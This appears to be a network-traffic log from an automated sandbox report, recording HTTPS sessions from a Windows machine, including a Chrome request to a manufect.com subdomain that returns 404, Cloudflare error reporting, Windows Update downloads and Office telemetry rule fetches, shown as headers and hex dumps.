                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: no-cors
                  Sec-Fetch-Dest: image
                  Referer: https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-10-23 04:47:08 UTC918INHTTP/1.1 404 Not Found
                  Date: Wed, 23 Oct 2024 04:47:07 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                  pragma: no-cache
                  x-turbo-charged-by: LiteSpeed
                  CF-Cache-Status: BYPASS
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BKskuMuHsWuq9H5SQ1x4a5A7T3NZ2oXBaxR1lKURcEHtRoX%2BH%2Fyd4B8zmGEXUX4Uh5T%2FwgeFlPo%2Bh7wvW1VWa3aZ8Q2qj5oKscW3NVhpAbRnYobsSockpjWlhXYr4Bj4sRe3sfSu7nm2TF68jbvevxgsuYJHqI7LWUjHqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8d6f16598aaaea9c-DFW
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=1064&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1279&delivery_rate=2625566&cwnd=225&unsent_bytes=0&cid=d3fa1e1d4088614c&ts=1368&x=0"
                  2024-10-23 04:47:08 UTC451INData Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d
                  Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}
                  2024-10-23 04:47:08 UTC807INData Raw: 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68
                  Data Ascii: style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h
                  2024-10-23 04:47:08 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.44974335.190.80.14431136C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:08 UTC604OUTOPTIONS /report/v4?s=%2BKskuMuHsWuq9H5SQ1x4a5A7T3NZ2oXBaxR1lKURcEHtRoX%2BH%2Fyd4B8zmGEXUX4Uh5T%2FwgeFlPo%2Bh7wvW1VWa3aZ8Q2qj5oKscW3NVhpAbRnYobsSockpjWlhXYr4Bj4sRe3sfSu7nm2TF68jbvevxgsuYJHqI7LWUjHqg%3D%3D HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Origin: https://t3sp2vzrhieujyp67175b9328f1f.manufect.com
                  Access-Control-Request-Method: POST
                  Access-Control-Request-Headers: content-type
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-10-23 04:47:08 UTC336INHTTP/1.1 200 OK
                  Content-Length: 0
                  access-control-max-age: 86400
                  access-control-allow-methods: POST, OPTIONS
                  access-control-allow-origin: *
                  access-control-allow-headers: content-length, content-type
                  date: Wed, 23 Oct 2024 04:47:08 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.44974535.190.80.14431136C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:09 UTC520OUTPOST /report/v4?s=%2BKskuMuHsWuq9H5SQ1x4a5A7T3NZ2oXBaxR1lKURcEHtRoX%2BH%2Fyd4B8zmGEXUX4Uh5T%2FwgeFlPo%2Bh7wvW1VWa3aZ8Q2qj5oKscW3NVhpAbRnYobsSockpjWlhXYr4Bj4sRe3sfSu7nm2TF68jbvevxgsuYJHqI7LWUjHqg%3D%3D HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Content-Length: 534
                  Content-Type: application/reports+json
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-10-23 04:47:09 UTC534OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 36 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 33 73 70 32 76 7a 72 68 69 65 75 6a 79 70 36 37 31 37 35 62 39 33 32 38 66 31 66 2e 6d 61 6e 75 66 65 63 74 2e 63 6f 6d 2f 64 34 37 36 31 34 38 36 64 35 36 37 38 35 39 35 30 36 31 35 30 2f 68 64 51 72 63 45 77 50 58 61 4b 2f 36 61 36 33 36 32 37 38 34 65 36 65 34 65 34 62 34 35 36 31 26 5f 77 65 62 70 61 63 6b 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f
                  Data Ascii: [{"age":0,"body":{"elapsed_time":368,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack","sampling_fraction":1.0,"server_
                  2024-10-23 04:47:09 UTC168INHTTP/1.1 200 OK
                  Content-Length: 0
                  date: Wed, 23 Oct 2024 04:47:09 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.449744184.28.90.27443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:09 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  User-Agent: Microsoft BITS/7.8
                  Host: fs.microsoft.com
                  2024-10-23 04:47:09 UTC467INHTTP/1.1 200 OK
                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                  Content-Type: application/octet-stream
                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                  Server: ECAcc (lpl/EF06)
                  X-CID: 11
                  X-Ms-ApiVersion: Distribute 1.2
                  X-Ms-Region: prod-neu-z1
                  Cache-Control: public, max-age=129543
                  Date: Wed, 23 Oct 2024 04:47:09 GMT
                  Connection: close
                  X-CID: 2


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449746184.28.90.27443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:10 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                  Range: bytes=0-2147483646
                  User-Agent: Microsoft BITS/7.8
                  Host: fs.microsoft.com
                  2024-10-23 04:47:10 UTC515INHTTP/1.1 200 OK
                  ApiVersion: Distribute 1.1
                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                  Content-Type: application/octet-stream
                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                  Server: ECAcc (lpl/EF06)
                  X-CID: 11
                  X-Ms-ApiVersion: Distribute 1.2
                  X-Ms-Region: prod-weu-z1
                  Cache-Control: public, max-age=129511
                  Date: Wed, 23 Oct 2024 04:47:10 GMT
                  Content-Length: 55
                  Connection: close
                  X-CID: 2
                  2024-10-23 04:47:10 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449747172.202.163.200443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:17 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=88KnOsUeSkFa84f&MD=LxyM8EeK HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                  Host: slscr.update.microsoft.com
                  2024-10-23 04:47:17 UTC560INHTTP/1.1 200 OK
                  Cache-Control: no-cache
                  Pragma: no-cache
                  Content-Type: application/octet-stream
                  Expires: -1
                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                  MS-CorrelationId: 1c0629d2-4906-411a-a683-e88e95e8a230
                  MS-RequestId: 24dbe347-66bc-4783-84ba-4ad0925986a8
                  MS-CV: GmnD3rqMXkSdFFOV.0
                  X-Microsoft-SLSClientCache: 2880
                  Content-Disposition: attachment; filename=environment.cab
                  X-Content-Type-Options: nosniff
                  Date: Wed, 23 Oct 2024 04:47:17 GMT
                  Connection: close
                  Content-Length: 24490
                  2024-10-23 04:47:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                  2024-10-23 04:47:17 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.4497534.245.163.56443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:56 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=88KnOsUeSkFa84f&MD=LxyM8EeK HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                  Host: slscr.update.microsoft.com
                  2024-10-23 04:47:56 UTC560INHTTP/1.1 200 OK
                  Cache-Control: no-cache
                  Pragma: no-cache
                  Content-Type: application/octet-stream
                  Expires: -1
                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                  MS-CorrelationId: d7684536-334e-4600-b53f-9e0f647a6d52
                  MS-RequestId: b558a3a3-00de-4b87-ba09-df8ac9f84f1b
                  MS-CV: 2mDpt/GB00KV0L2w.0
                  X-Microsoft-SLSClientCache: 1440
                  Content-Disposition: attachment; filename=environment.cab
                  X-Content-Type-Options: nosniff
                  Date: Wed, 23 Oct 2024 04:47:55 GMT
                  Connection: close
                  Content-Length: 30005
                  2024-10-23 04:47:56 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                  2024-10-23 04:47:57 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                  Session IDSource IPSource PortDestination IPDestination Port
                  8192.168.2.44975413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:47:59 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:47:59 UTC540INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:47:59 GMT
                  Content-Type: text/plain
                  Content-Length: 218853
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public
                  Last-Modified: Mon, 21 Oct 2024 13:21:21 GMT
                  ETag: "0x8DCF1D34132B902"
                  x-ms-request-id: 04de7e24-801e-008f-0e20-242c5d000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044759Z-16849878b78c5zx4gw8tcga1b400000005ng000000006uzz
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:47:59 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                  2024-10-23 04:47:59 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                  Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                  2024-10-23 04:47:59 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                  Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                  2024-10-23 04:48:00 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                  Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                  2024-10-23 04:48:00 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                  Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                  2024-10-23 04:48:00 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 